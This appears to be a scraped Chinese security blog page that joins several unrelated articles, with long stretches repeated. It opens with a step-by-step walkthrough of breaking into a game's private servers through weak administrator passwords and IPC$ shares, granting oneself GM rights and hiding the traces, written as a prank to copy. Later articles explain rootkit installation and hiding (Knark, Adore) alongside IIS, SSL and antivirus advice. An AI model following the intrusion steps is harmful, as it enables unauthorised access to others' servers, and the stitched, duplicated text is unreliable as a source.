雖覺得是好玩,但玩盛大的簡直是在受罪,升級慢,沒好裝備,處處受人欺負。所以,4f是明
智的選擇,但進去時也沒有好裝備,也是受人欺負,難道我不可以做gm?試試,folling me!
找來一大堆4f的ip,開個x-scan掃吧。有了,還真不少,都是弱口令的,這些網管真菜呀。
選好一個,192.168.0.1,go!
打開cmd,
1)c:/>net use 192.168.0.1ipc$ /user:administrator
連接成功,
ok,連上了,成功在望,
2)c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt
系統找不到指定的文件。
沒有?不可能吧?唔,一定是隱藏了,沒關系,再來,
3)c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt
沒有提示,成功了,
這次連復制也不用了,直接改吧,
4)c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt
會打開個介面,看看里面有哪些gm,加個吧,自己記得就行了,改完保存退出
5)c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt
把adminilist.txt還原成只讀隱藏,
好了,大功告成,快打掃腳印吧,別讓人發現被入侵了,
現在,就等著系統重啟了,等不及的話就在第五步讓它重啟,不過這樣太危險了,還是等吧,
第二天注冊個帳號,新建個之前加的人名進去,
/who
當前150人在線
哈,我就是gm了。趕快把自己升級,
@level -1
升級成功,255級,哈哈
再造出想要的裝備,想要什么盡情造吧,
重復上面的把自己從adminlist.txt里刪了,哈哈,好裝備到手了,可以玩了
面記得有位朋友對加強對服務器安全性的解決方法進行了一系列的說明,講得非常詳細,但是我覺得還有很多需要補充的地方.微軟的系統是漏洞和補丁著稱,真正要對服務器的安全配置確實非常困難,考慮的方面也太多了.
今天先講一個方面的內容了,也算是對前面的朋友的進一步補充吧!
前面那位朋友所概述的主要是針對WIN2000系統弱口令的安全設置!他已經說得很仔細了,做到那些,口令這一關差不多了.確實在互聯網的時代,口令真的非常重要.我對國外的主機進行了一系列的測試,就拿有弱口令的系統來說,還有不少!其中也包括了不少中小型企業的WEB服務器,E-MAIL,PROXY服務器都有這種低級的錯誤!
如果說你在這方面做得非常的仔細.但你至少還要仔細研究一下你主機現在所運行的有哪些服務,這些服務代表著什么?你應該很清楚!因為現在黑客軟件,木馬工具,遠程控制軟件大多是以一種服務的形式運行在你的服務器系統里,一般的防火墻,殺毒軟件對其并沒有任何反映的.對于服務形式出現的控制工具.比較難得發現,所以你就必須在服務器里運行的哪些服務非常熟悉.對于陌生或奇怪的服務應該安全設置好.
下面我都WIN2000的WWW(IIS)服務器安全配置略講一下,WWW服務在WIN2000SERVER,ADSERVER,DATACENTERSERVER,版本中是默認安裝的,如果你不需要用2000的WWW服務的話,建議不要安裝.至于添加/刪除你可以控制面板的去掉他的安裝,或者在管理工具/服務里設置WORD WIDE WEB SERVICE啟動類型為手動/禁用
這樣的話系統就不默認啟動改服務!
如果你需要用IIS來建站宣傳一下自己的私服,你就必須按以下方法安全配置好IIS,
在IIS組件你首先要去掉你不需要的SMTP,SNNP,FTP,這樣的話你可以降低你服務器運行所占用的CPU資源,和內存使用率.然后建議你刪除你C:\INTERPUB\目錄下的所有內容!或者更改路徑.在IIS管理器中刪除默認站點,(或者刪除SCRIPTS這個虛擬目錄)因為這個目錄有可寫的權限的.在新建的WEB站點中,設置IIS的權置,必須讓它不能寫入,或運行.因為IIS是默認支持ASP腳本的.然后在IIS中刪除不需要的映射,這個很重要.如果你要支持PHP,CGI腳本的話,你還得配置好PHP.CGI的應用程序的正確映射,禁用或刪除FSO組件,(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的話,最好要改名!否則的話,你給別人提供主頁上傳的話,你肯定是會被黑的。小心呀!
目前在黑客橫行的互聯網空間中,利用IIS的漏洞,提申自己的權限,而成為AD,這些只是輕而易舉的事情,這不需要花幾天的時間去暴力破解一下口令,像自己架設的WEB服務器有種情況,更是數不甚數了.關于怎利用UNICODE漏洞去提供AD權限的文章,網上太多了,我就不多講了.
這些來說應該是服務器安全防范方面的一個例子而已,真正要做到服務器的安全運行,需要你花大量的時間去摸索.因為這些來說,足以應付一些無聊的.....當然了,你如果需要WEB服務器,我還是建議你去使用AP了.他的源代碼開發,免費,安全性穩定性都比IIS強得多了.
可怕的Rootkit木馬后門
[ 2007-03-25 03:05:43 | 作者: sun ]
在我們獲得了對目標的控制權后,還想保持這種控制權限,于是就出現了木馬后門,Rootkit之類的保護權限的手段。首先來說一下我們常見的應用層次的木馬后門,比如我們常見的遠程控制類的軟件,像國外的Sub7、VNC、netbus,國內的冰河、灰鴿子、黑洞等等,這些大家都很熟悉因此就不詳細介紹了。然而此類后門的可以很容易被發現,現在的殺毒軟件大多都能輕松的查處,即使暫時查不到,用其他手段檢測也不是很困難,現在就我就給大家介紹一種比一般木馬后門潛伏的更深的一類木馬后門--Rootkit。
傳統的Rootkit是一種比普通木馬后門更為陰險的木馬后門。它主要通過替換系統文件來達到目的。這樣就會更加的隱蔽,使檢測變得比較困難。傳統的Rootkit對一系列平臺均有效,但主要是針對Unix的,比如Linux,AIX,SunOs等操作系統。當然有些Rootkits可以通過替換DLL文件或更改系統來攻擊Windows平臺。Rootkit并不能讓你直接獲得權限,相反它是在你通過各種方法獲得權限后才能使用的一種保護權限的措施,在我們獲取系統根權限(根權限即root權限,是Unix系統的最高權限)以后,Rootkits提供了一套工具用來建立后門和隱藏行跡,從而讓攻擊者保住權限。
下面就針對Unix來講解一下傳統Rootkit的攻擊原理。
RootKits是如何實現后門的呢?為了理解Rootkits后門,有必要先了解一下Unix的基本工作流程,當我們訪問Unix時(不管是本地還是遠程登陸),/bin/login程序都會運行,系統將通過/bin/login來收集并核對用戶的帳號和密碼。Rootkits使用一個帶有根權限后門密碼的/bin/login來替換系統的/bin/login,這樣攻擊者輸入根權限后門的密碼,就能進入系統。就算管理員更改了原來的系統密碼或者把密碼清空。我們仍能夠使用后門密碼以根用戶身份登陸。在攻入Unix系統后,入侵者通常會進行一系列的攻擊動作,如安裝嗅探器收集重要數據,而Unix中也會有些系統文件會監視這些動作,比如ifconfig等,Rootkit當然不會束手就擒,它會同樣替換一下這些系統文件,通常被Rootkit替換的系統程序有login,ifconfig,du,find,ls,netstart,ps等。由于篇幅問題,這些系統文件的功能就不一一羅列,有興趣的讀者可以自己去查找,現在Rootkit的工具很多,里面基本都是包含一些處理過的系統文件來代替原來的系統文件的,像tOmkit等一些Rootkit就是比較優秀的了。
防御辦法:Rootkit如此可怕,得好好防它才行,實際上,防御他的最有效的方法時定期的對重要系統文件的完整性進行核查,這類的工具很多,像Tripwire就是一個非常不錯的文件完整性檢查工具。一但發現遭受到Rootkit攻擊,那你就比較麻煩了,你必須完全重裝所有的系統文件部件和程序,以確保安全性。
寫到這里,戰爭似乎結束了,然而更可怕的Rootkit還沒登場,那就是更加恐怖( 這個詞一點也不夸張)的內核級Rootkit。在大多數操作系統中(各種Uni x和Windows),內核是操作系統最基本的部件,它控制著對網絡設備、進程、系統內存、磁盤等的訪問。例如當你打開一個文件時,打開文件的請求被發送到內核,內核負責從磁盤得到文件的比特位并運行你的文件瀏覽程序。內核級Rootkit使攻擊者獲得對系統底層的完全控制權。攻擊者可以修改你的內核,大多數內核級Rootkit都能進行執行重定向,即截獲運行某一程序的命令,將其重定向到入侵者所選中的程序并運行此程序。也就是說用戶或管理員要運行程序A,被修改過的內核假裝執行A,實際卻執行了程序B。現在就介紹一下內核級的Rootkit是如何攻擊Unix系統的。
和傳統的Rootkit不同,Unix的bin/login并未被修改,但所有執行/bin/login 的請求(當登陸系統時將產生)都被重定向到攻擊者制作的隱藏文件/bin/backdoorlogin,這樣當系統管理員使用檢測傳統級別的Rootkit的方法(比如用tripwire之類的軟件檢測文件的完整性)就行不通了,因為/bin/login并沒有被改變。同樣的道理,攻擊者對其他的系統程序也進行重定,這樣你的操作實際就是按照入侵者的意愿執行了。也就是說,表面上你在運行程序A,你也認為自己運行的是程序A,而實際上你運行的是入侵者設定的程序B!
更恐怖的是,內核級Rootkit不僅僅只會進行執行重定向,許多內核級Rootkit還支持文件隱蔽。傳統的Rootkit是通過替換ls程序來實現文件的隱藏,而內核級的Rootkit則是通過對內核的修改來對ls程序欺騙,更加的陰險隱蔽。另外內核級的Rootkit還能對進程和網絡進行隱藏,用戶將得不到真實的系統情況報告。
實現思路:根據系統的類型,攻擊者有不同的方法來對內核進行修改,在N種Unix系統上修改內核最簡單的方法就是利用系統本身的加載的內核模塊(LKM)的功能,因此大多數的內核級Rootkit通過利用LKM動態地將內核更新來提供新功能,新添加的模塊擴展了內核,同時對內核和其他使用內核的所有東西有了完全訪問權。
因此,許多內核級Rootkit都通過LKM來實現。安裝通過LKM實現的內核級Rootkit十分簡單。例如,在Linux上安裝Knark內核級Rootkit只需具有根權限的入侵者輸入命令: insmod knark.o 就行了,模塊被安裝后就等著我們輸入命令了。更妙的是整個過程不需要重啟。通過LKM 實現的Rootkit在Unix上十分流行。我們也常常會通過給Windows平臺打LKM補丁的方法攻擊Windows。
內核級Rootkit 的幾個例子
現在有大量的內核級Rootkit可用,現在我就選幾種比較強大的來跟大家討論一下。
一、 linux 上的內核級Rootkit:Knark
Knark具有各種標準的內核級Rootkit功能,包括執行重定向,文件隱藏,進程隱藏和網絡隱藏。另外,還有不少比較過癮的功能,如:
1、遠程執行:我們可以通過網絡向運行Knark的機器發送一條命令,源地址是假造的,命令被發往UDP端口53,使之表面上看起來像是DNS流量。我們就可以利用這個功能來升級Knark,刪除系統文件或其他任何我們想做的事。
2、任務攻擊:當某一進程在系統上運行時,它總是具有與UID和有效的UID(EUID)相關的權限。另外進程還具有與文件系統UID(FSUID)相關的文件及目錄訪問權。Knark的任務攻擊能力可實時地將進程UID,EUID和FSUID改變。進程在不停止運動的情況下突然具有了新的權限。
3、隱藏混雜模式:同一般的RootKit一樣,入侵者也會在受害者機器上運行嗅探器。我們可以用文件隱藏和進程隱藏將嗅探器隱藏起來。然而,以太網卡會被設成混雜模式,管理員可以檢查到這一點Knark將內核進行了修改,使之隱瞞網卡的混合模式,這將使嗅探變得更加隱秘。
4、實時進程隱藏:Knark可以將一個正在運行的進程隱藏起來。通過發送信號31給一個進程,此進程將消失,但仍在運行。命令kill-31 process_id將阻止內核匯報任何有關此進程的信息。進程在運行時,ps和lsof命令的使用都不能顯示此進程。
5、內核模塊隱藏:Linux中的lsmod命令可以列出當前在機器上安裝的LKM。我們自然不想讓管理員看到Knark模塊,因此Knark包含了一個單獨的模塊modhide,modhide將Knark和自己隱藏了起來。這樣,當我們用Knark攻擊一個系統時,我們首先為Knark.o做一個insmod,然后為modhide.o做一個insmod。這樣不管誰運行lsmod命令,這些模塊都不會被發現。
二、 另一個Linux上的內核級Rootkit:Adore
同Knark一樣,Adore也是一個針對Linux的LKM RootKit。 他包含了標準的內核級Rootkit功能,如文件隱藏,進程隱藏,網絡隱藏和內核模塊隱藏。我們只所以討論Adore,是因為他還有一個非常強大的功能:內置的根權限后門。
Adore的根權限后門可以讓我們連接到系統上并獲得根權限的命令外殼,此功能十分直接了當 ,Adore將此功能巧妙的包含在內核模塊中了。這一招十分難破,因為管理員看不到任何文件、進程、偵聽網絡端口的跡象。
防御辦法:防御內核級的Rootkit的根本辦法是不要讓攻擊者得到你的機器的系統的根本權限(Unix里的root和Windows里的admin),不過這看起來像廢話,目前對內核級的Rootkit還沒有絕對的防御體系。
現在也存在一些Rootkit自動檢測工具,但都不是很可靠。同時內核級的Rootkit也在不斷的發展中,對一些系統來說防御它最好的辦法是使用不支持LKM的內核,Linux的內核就可以設成不支持LKM的單一內核。
傳統的Rootkit是一種比普通木馬后門更為陰險的木馬后門。它主要通過替換系統文件來達到目的。這樣就會更加的隱蔽,使檢測變得比較困難。傳統的Rootkit對一系列平臺均有效,但主要是針對Unix的,比如Linux,AIX,SunOs等操作系統。當然有些Rootkits可以通過替換DLL文件或更改系統來攻擊Windows平臺。Rootkit并不能讓你直接獲得權限,相反它是在你通過各種方法獲得權限后才能使用的一種保護權限的措施,在我們獲取系統根權限(根權限即root權限,是Unix系統的最高權限)以后,Rootkits提供了一套工具用來建立后門和隱藏行跡,從而讓攻擊者保住權限。
下面就針對Unix來講解一下傳統Rootkit的攻擊原理。
RootKits是如何實現后門的呢?為了理解Rootkits后門,有必要先了解一下Unix的基本工作流程,當我們訪問Unix時(不管是本地還是遠程登陸),/bin/login程序都會運行,系統將通過/bin/login來收集并核對用戶的帳號和密碼。Rootkits使用一個帶有根權限后門密碼的/bin/login來替換系統的/bin/login,這樣攻擊者輸入根權限后門的密碼,就能進入系統。就算管理員更改了原來的系統密碼或者把密碼清空。我們仍能夠使用后門密碼以根用戶身份登陸。在攻入Unix系統后,入侵者通常會進行一系列的攻擊動作,如安裝嗅探器收集重要數據,而Unix中也會有些系統文件會監視這些動作,比如ifconfig等,Rootkit當然不會束手就擒,它會同樣替換一下這些系統文件,通常被Rootkit替換的系統程序有login,ifconfig,du,find,ls,netstart,ps等。由于篇幅問題,這些系統文件的功能就不一一羅列,有興趣的讀者可以自己去查找,現在Rootkit的工具很多,里面基本都是包含一些處理過的系統文件來代替原來的系統文件的,像tOmkit等一些Rootkit就是比較優秀的了。
防御辦法:Rootkit如此可怕,得好好防它才行,實際上,防御他的最有效的方法時定期的對重要系統文件的完整性進行核查,這類的工具很多,像Tripwire就是一個非常不錯的文件完整性檢查工具。一但發現遭受到Rootkit攻擊,那你就比較麻煩了,你必須完全重裝所有的系統文件部件和程序,以確保安全性。
寫到這里,戰爭似乎結束了,然而更可怕的Rootkit還沒登場,那就是更加恐怖( 這個詞一點也不夸張)的內核級Rootkit。在大多數操作系統中(各種Uni x和Windows),內核是操作系統最基本的部件,它控制著對網絡設備、進程、系統內存、磁盤等的訪問。例如當你打開一個文件時,打開文件的請求被發送到內核,內核負責從磁盤得到文件的比特位并運行你的文件瀏覽程序。內核級Rootkit使攻擊者獲得對系統底層的完全控制權。攻擊者可以修改你的內核,大多數內核級Rootkit都能進行執行重定向,即截獲運行某一程序的命令,將其重定向到入侵者所選中的程序并運行此程序。也就是說用戶或管理員要運行程序A,被修改過的內核假裝執行A,實際卻執行了程序B。現在就介紹一下內核級的Rootkit是如何攻擊Unix系統的。
和傳統的Rootkit不同,Unix的bin/login并未被修改,但所有執行/bin/login 的請求(當登陸系統時將產生)都被重定向到攻擊者制作的隱藏文件/bin/backdoorlogin,這樣當系統管理員使用檢測傳統級別的Rootkit的方法(比如用tripwire之類的軟件檢測文件的完整性)就行不通了,因為/bin/login并沒有被改變。同樣的道理,攻擊者對其他的系統程序也進行重定,這樣你的操作實際就是按照入侵者的意愿執行了。也就是說,表面上你在運行程序A,你也認為自己運行的是程序A,而實際上你運行的是入侵者設定的程序B!
更恐怖的是,內核級Rootkit不僅僅只會進行執行重定向,許多內核級Rootkit還支持文件隱蔽。傳統的Rootkit是通過替換ls程序來實現文件的隱藏,而內核級的Rootkit則是通過對內核的修改來對ls程序欺騙,更加的陰險隱蔽。另外內核級的Rootkit還能對進程和網絡進行隱藏,用戶將得不到真實的系統情況報告。
實現思路:根據系統的類型,攻擊者有不同的方法來對內核進行修改,在N種Unix系統上修改內核最簡單的方法就是利用系統本身的加載的內核模塊(LKM)的功能,因此大多數的內核級Rootkit通過利用LKM動態地將內核更新來提供新功能,新添加的模塊擴展了內核,同時對內核和其他使用內核的所有東西有了完全訪問權。
因此,許多內核級Rootkit都通過LKM來實現。安裝通過LKM實現的內核級Rootkit十分簡單。例如,在Linux上安裝Knark內核級Rootkit只需具有根權限的入侵者輸入命令: insmod knark.o 就行了,模塊被安裝后就等著我們輸入命令了。更妙的是整個過程不需要重啟。通過LKM 實現的Rootkit在Unix上十分流行。我們也常常會通過給Windows平臺打LKM補丁的方法攻擊Windows。
內核級Rootkit 的幾個例子
現在有大量的內核級Rootkit可用,現在我就選幾種比較強大的來跟大家討論一下。
一、 linux 上的內核級Rootkit:Knark
Knark具有各種標準的內核級Rootkit功能,包括執行重定向,文件隱藏,進程隱藏和網絡隱藏。另外,還有不少比較過癮的功能,如:
1、遠程執行:我們可以通過網絡向運行Knark的機器發送一條命令,源地址是假造的,命令被發往UDP端口53,使之表面上看起來像是DNS流量。我們就可以利用這個功能來升級Knark,刪除系統文件或其他任何我們想做的事。
2、任務攻擊:當某一進程在系統上運行時,它總是具有與UID和有效的UID(EUID)相關的權限。另外進程還具有與文件系統UID(FSUID)相關的文件及目錄訪問權。Knark的任務攻擊能力可實時地將進程UID,EUID和FSUID改變。進程在不停止運動的情況下突然具有了新的權限。
3、隱藏混雜模式:同一般的RootKit一樣,入侵者也會在受害者機器上運行嗅探器。我們可以用文件隱藏和進程隱藏將嗅探器隱藏起來。然而,以太網卡會被設成混雜模式,管理員可以檢查到這一點Knark將內核進行了修改,使之隱瞞網卡的混合模式,這將使嗅探變得更加隱秘。
4、實時進程隱藏:Knark可以將一個正在運行的進程隱藏起來。通過發送信號31給一個進程,此進程將消失,但仍在運行。命令kill-31 process_id將阻止內核匯報任何有關此進程的信息。進程在運行時,ps和lsof命令的使用都不能顯示此進程。
5、內核模塊隱藏:Linux中的lsmod命令可以列出當前在機器上安裝的LKM。我們自然不想讓管理員看到Knark模塊,因此Knark包含了一個單獨的模塊modhide,modhide將Knark和自己隱藏了起來。這樣,當我們用Knark攻擊一個系統時,我們首先為Knark.o做一個insmod,然后為modhide.o做一個insmod。這樣不管誰運行lsmod命令,這些模塊都不會被發現。
二、 另一個Linux上的內核級Rootkit:Adore
同Knark一樣,Adore也是一個針對Linux的LKM RootKit。 他包含了標準的內核級Rootkit功能,如文件隱藏,進程隱藏,網絡隱藏和內核模塊隱藏。我們只所以討論Adore,是因為他還有一個非常強大的功能:內置的根權限后門。
Adore的根權限后門可以讓我們連接到系統上并獲得根權限的命令外殼,此功能十分直接了當 ,Adore將此功能巧妙的包含在內核模塊中了。這一招十分難破,因為管理員看不到任何文件、進程、偵聽網絡端口的跡象。
防御辦法:防御內核級的Rootkit的根本辦法是不要讓攻擊者得到你的機器的系統的根本權限(Unix里的root和Windows里的admin),不過這看起來像廢話,目前對內核級的Rootkit還沒有絕對的防御體系。
現在也存在一些Rootkit自動檢測工具,但都不是很可靠。同時內核級的Rootkit也在不斷的發展中,對一些系統來說防御它最好的辦法是使用不支持LKM的內核,Linux的內核就可以設成不支持LKM的單一內核。
安全技巧教你妙用SSL給IIS也加一把鎖
[ 2007-03-25 03:05:29 | 作者: sun ]
由于NT系統的易維護性,越來越多的中小企業在自己的網站上和內部辦公管理系統上采用它,而且很多都是用默認的IIS來做WEB服務器使用。當然不能否認近來威脅NT系統的幾個漏洞都是由于IIS配置不當造成的,而且可以預見,未來IIS還會被發現很多新的漏洞和安全問題,但只要我們做好合理的安全配置,還是可以避免很多安全隱患的。本文并沒有系統的去講如何全面安全的配置IIS,我只是從利用SSL加密HTTP通道來講如果加強IIS安全的。
一、建立SSL安全機制
IIS的身份認證除了匿名訪問、基本驗證和Windows NT請求/響應方式外,還有一種安全性更高的認證,就是通過SSL(Security Socket Layer)安全機制使用數字證書。SSL(加密套接字協議層)位于HTTP層和TCP層之間,建立用戶與服務器之間的加密通信,確保所傳遞信息的安全性。SSL是工作在公共密鑰和私人密鑰基礎上的,任何用戶都可以獲得公共密鑰來加密數據,但解密數據必須要通過相應的私人密鑰。使用SSL安全機制時,首先客戶端與服務器建立連接,服務器把它的數字證書與公共密鑰一并發送給客戶端,客戶端隨機生成會話密鑰,用從服務器得到的公共密鑰對會話密鑰進行加密,并把會話密鑰在網絡上傳遞給服務器,而會話密鑰只有在服務器端用私人密鑰才能解密,這樣,客戶端和服務器端就建立了一個惟一的安全通道。
建立了SSL安全機制后,只有SSL允許的客戶才能與SSL允許的Web站點進行通信,并且在使用URL資源定位器時,輸入https:// ,而不是http://。
簡單的說默認情況下我們所使用的HTTP協議是沒有任何加密措施的,所有的消息全部都是以明文形式在網絡上傳送的,惡意的攻擊者可以通過安裝監聽程序來獲得我們和服務器之間的通訊內容。這點危害在一些企業內部網絡中尤其比較大,對于使用HUB的企業內網來說簡直就是沒有任何安全可講因為任何人都可以在一臺電腦上看到其他人在網絡中的活動,對于使用交換機來組網的網絡來說雖然安全威脅性要小很多,但很多時候還是會有安全突破口,比如沒有更改交換機的默認用戶和口令,被人上去把自己的網絡接口設置為偵聽口,依然可以監視整個網絡的所有活動。
所以全面加密整個網絡傳輸隧道的確是個很好的安全措施,很可惜的是現在網絡上有關于具體給IIS配置SSL的文章并不是很多,我簡單的摸索了下把我的經驗拿出來給大家分享。
二、操作辦法
以Windows2000服務器版本的來做例子講解的,我們首先需要在控制面板里的填加刪除WINDOWS組件中去安裝證書服務,這個服務在默認安裝中是沒有安裝在系統里的,需要安裝光盤來安裝。
由于我們是第一次配置,所以選擇創建一個新的證書。用默認的站點名稱和加密位長設置就可以了。頒發成功以后我們在頒發的證書里找到剛才頒發的證書,雙擊其屬性欄目然后在詳細信息里選擇將證書復制到文件。我們需要把證書導出到一個文件,這里我們把證書導出到c: sql.cer這個文件里。重新回到IIS的WEB管理界面里重新選擇證書申請,這個時候出來的界面就是掛起的證書請求了。
一、建立SSL安全機制
IIS的身份認證除了匿名訪問、基本驗證和Windows NT請求/響應方式外,還有一種安全性更高的認證,就是通過SSL(Security Socket Layer)安全機制使用數字證書。SSL(加密套接字協議層)位于HTTP層和TCP層之間,建立用戶與服務器之間的加密通信,確保所傳遞信息的安全性。SSL是工作在公共密鑰和私人密鑰基礎上的,任何用戶都可以獲得公共密鑰來加密數據,但解密數據必須要通過相應的私人密鑰。使用SSL安全機制時,首先客戶端與服務器建立連接,服務器把它的數字證書與公共密鑰一并發送給客戶端,客戶端隨機生成會話密鑰,用從服務器得到的公共密鑰對會話密鑰進行加密,并把會話密鑰在網絡上傳遞給服務器,而會話密鑰只有在服務器端用私人密鑰才能解密,這樣,客戶端和服務器端就建立了一個惟一的安全通道。
建立了SSL安全機制后,只有SSL允許的客戶才能與SSL允許的Web站點進行通信,并且在使用URL資源定位器時,輸入https:// ,而不是http://。
簡單的說默認情況下我們所使用的HTTP協議是沒有任何加密措施的,所有的消息全部都是以明文形式在網絡上傳送的,惡意的攻擊者可以通過安裝監聽程序來獲得我們和服務器之間的通訊內容。這點危害在一些企業內部網絡中尤其比較大,對于使用HUB的企業內網來說簡直就是沒有任何安全可講因為任何人都可以在一臺電腦上看到其他人在網絡中的活動,對于使用交換機來組網的網絡來說雖然安全威脅性要小很多,但很多時候還是會有安全突破口,比如沒有更改交換機的默認用戶和口令,被人上去把自己的網絡接口設置為偵聽口,依然可以監視整個網絡的所有活動。
所以全面加密整個網絡傳輸隧道的確是個很好的安全措施,很可惜的是現在網絡上有關于具體給IIS配置SSL的文章并不是很多,我簡單的摸索了下把我的經驗拿出來給大家分享。
二、操作辦法
以Windows2000服務器版本的來做例子講解的,我們首先需要在控制面板里的填加刪除WINDOWS組件中去安裝證書服務,這個服務在默認安裝中是沒有安裝在系統里的,需要安裝光盤來安裝。
由于我們是第一次配置,所以選擇創建一個新的證書。用默認的站點名稱和加密位長設置就可以了。頒發成功以后我們在頒發的證書里找到剛才頒發的證書,雙擊其屬性欄目然后在詳細信息里選擇將證書復制到文件。我們需要把證書導出到一個文件,這里我們把證書導出到c: sql.cer這個文件里。重新回到IIS的WEB管理界面里重新選擇證書申請,這個時候出來的界面就是掛起的證書請求了。
分析 病毒殺不死的原因
[ 2007-03-25 03:05:18 | 作者: sun ]
原因:
1.病毒正在運行。由于Windows保護正在運行的程序,所以殺毒軟件是無法殺死正在運行的病毒。即使是真的殺死了病毒,電腦正常關機時內存中活動的病毒還會再復制一個病毒到硬盤上; (建議在安全模式下殺毒)
2.病毒隱藏在系統還原的文件夾“_restore”中;
3.刪除注冊表中RUN多余的啟動項。
解決辦法:
1.在Windows中殺毒前首先得中止病毒進程。對于WindowsXp/2000,可以使用任務管理器(Ctrl+Alt+Del三鍵齊按)來查看當前所有的進程,而對于Windows98/Me,則可以使用“黑客入門工具箱”或ATM來查看進程。確定哪個是來歷不明的就停止掉,該過程俗稱“殺進程”。不要怕出錯,因為不會對電腦造成任何損壞,最多就是死機。注意,殺進程的操作有時得進行兩次才成功。有的病毒有兩個進程,互相保護,殺掉一個則會被另一個發現并恢復。此時應先把該病毒在注冊表中的啟動項去掉,然后用突然斷電的方式重啟電腦(不讓病毒對系統有任何保存的操作),再進入安全模式殺。
2.在Windows中使用專殺工具殺毒。得使用最新的殺毒版本(至少要更新病毒庫)。
3.禁用系統還原。在WindowsMe中禁用方法是∶鼠標右鍵點擊“我的電腦”-屬性-性能-文件系統-疑難解答-禁止系統還原。在WindowsXP中禁用方法是∶控制面板-系統-系統屬性-系統還原-在所有驅動器上關閉系統還原。然后用軟盤或U盤啟動電腦,在dos下刪除_RESTORE文件夾。
4.在Dos下殺毒不存在殺不死的問題。一般的殺毒軟件都可以制作軟盤版(含至少3張軟盤),用第一張盤啟動(CMOS中必須設定軟盤啟動在前)后按提示陸續放入其它盤就可以直接殺毒了。瑞星的軟盤版需要用鼠標確定殺毒的驅動器,而金山毒霸的軟盤版則默認全機查殺。實際上用金山毒霸在DOS下殺毒還可以更簡單,用普通軟盤啟動盤或U盤啟動盤啟動電腦后,先換到C盤,然后進入金山毒霸的目錄(命令:cd kav或cd kav5,與版本有關),然后輸入KAVDX,回車就開始殺毒了。
1.病毒正在運行。由于Windows保護正在運行的程序,所以殺毒軟件是無法殺死正在運行的病毒。即使是真的殺死了病毒,電腦正常關機時內存中活動的病毒還會再復制一個病毒到硬盤上; (建議在安全模式下殺毒)
2.病毒隱藏在系統還原的文件夾“_restore”中;
3.刪除注冊表中RUN多余的啟動項。
解決辦法:
1.在Windows中殺毒前首先得中止病毒進程。對于WindowsXp/2000,可以使用任務管理器(Ctrl+Alt+Del三鍵齊按)來查看當前所有的進程,而對于Windows98/Me,則可以使用“黑客入門工具箱”或ATM來查看進程。確定哪個是來歷不明的就停止掉,該過程俗稱“殺進程”。不要怕出錯,因為不會對電腦造成任何損壞,最多就是死機。注意,殺進程的操作有時得進行兩次才成功。有的病毒有兩個進程,互相保護,殺掉一個則會被另一個發現并恢復。此時應先把該病毒在注冊表中的啟動項去掉,然后用突然斷電的方式重啟電腦(不讓病毒對系統有任何保存的操作),再進入安全模式殺。
2.在Windows中使用專殺工具殺毒。得使用最新的殺毒版本(至少要更新病毒庫)。
3.禁用系統還原。在WindowsMe中禁用方法是∶鼠標右鍵點擊“我的電腦”-屬性-性能-文件系統-疑難解答-禁止系統還原。在WindowsXP中禁用方法是∶控制面板-系統-系統屬性-系統還原-在所有驅動器上關閉系統還原。然后用軟盤或U盤啟動電腦,在dos下刪除_RESTORE文件夾。
4.在Dos下殺毒不存在殺不死的問題。一般的殺毒軟件都可以制作軟盤版(含至少3張軟盤),用第一張盤啟動(CMOS中必須設定軟盤啟動在前)后按提示陸續放入其它盤就可以直接殺毒了。瑞星的軟盤版需要用鼠標確定殺毒的驅動器,而金山毒霸的軟盤版則默認全機查殺。實際上用金山毒霸在DOS下殺毒還可以更簡單,用普通軟盤啟動盤或U盤啟動盤啟動電腦后,先換到C盤,然后進入金山毒霸的目錄(命令:cd kav或cd kav5,與版本有關),然后輸入KAVDX,回車就開始殺毒了。
個人電腦防黑的安全準則
[ 2007-03-25 03:05:06 | 作者: sun ]
在這個網絡時代,每個人都可以輕易地從網絡上得到各種簡單易用的黑客工具,于是,眾多“黑客”就誕生了。這些人多半是一些無所事事的網蟲,天生就有破壞的欲望。于是無聊+表現欲促使他們拿著從網上找來的各種“炸彈”之類的東西開始在浩大的網絡中尋找可以炫耀一下自己本事的獵物。當你在網絡上沖浪,或是正在同別人聊天時,機器突然死機了或是藍屏了,網頁不能瀏覽了,QQ登錄不上去了,這時你就該想想自己是不是中毒了,或是被黑了。那么為防止我們的個人電腦被黑客攻擊,我們使用電腦時該遵循些什么樣的安全準則呢?
密碼安全準則
不要使用簡單的密碼。不要簡單地用生日、單詞或電話號碼作為密碼,密碼的長度至少要8個字符以上,包含數字、大、小寫字母和鍵盤上的其他字符混合。對于不同的網站和程序,要使用不同口令,以防止被黑客破譯。要記錄好你的ID和密碼以免忘記,但不要將記錄存放在上網的電腦里。不要為了下次登錄方便而保存密碼;還有,要經常更改密碼和不要向任何人透露您的密碼。
電子郵件安全準則
不要輕易打開電子郵件中的附件,更不要輕易運行郵件附件中的程序,除非你知道信息的來源。要時刻保持警惕性,不要輕易相信熟人發來的E-mail就一定沒有黑客程序,如Happy99就會自動加在E-mail附件當中。不要在網絡上隨意公布或者留下您的電子郵件地址,去轉信站申請一個轉信信箱,因為只有它是不怕炸的。在E-mail客戶端軟件中限制郵件大小和過濾垃圾郵件;使用遠程登錄的方式來預覽郵件;最好申請數字簽名;對于郵件附件要先用防病毒軟件和專業清除木馬的工具進行掃描后方可使用。
IE的安全準則
對于使用公共機器上網的網民,一定要注意IE的安全性。因為IE的自動完成功能在給用戶填寫表單和輸入Web地址帶來一定便利的同時,也給用戶帶來了潛在的泄密危險,最好禁用IE的自動完成功能。IE的歷史記錄中保存了用戶已經訪問過的所有頁面的鏈接,在離開之前一定要清除歷史記錄;另外IE的臨時文件夾(\Windows\Temporary Internet Files)內保存了用戶已經瀏覽過的網頁,通過IE的脫機瀏覽特性或者是其他第三方的離線瀏覽軟件,其他用戶能夠輕松地翻閱你瀏覽的內容,所以離開之前也需刪除該路徑下的文件。還要使用具有對Cookie程序控制權的安全程序,因為Cookie程序會把信息傳送回網站,當然安裝個人防火墻也可對Cookie的使用進行禁止、提示或啟用。
聊天軟件的安全準則
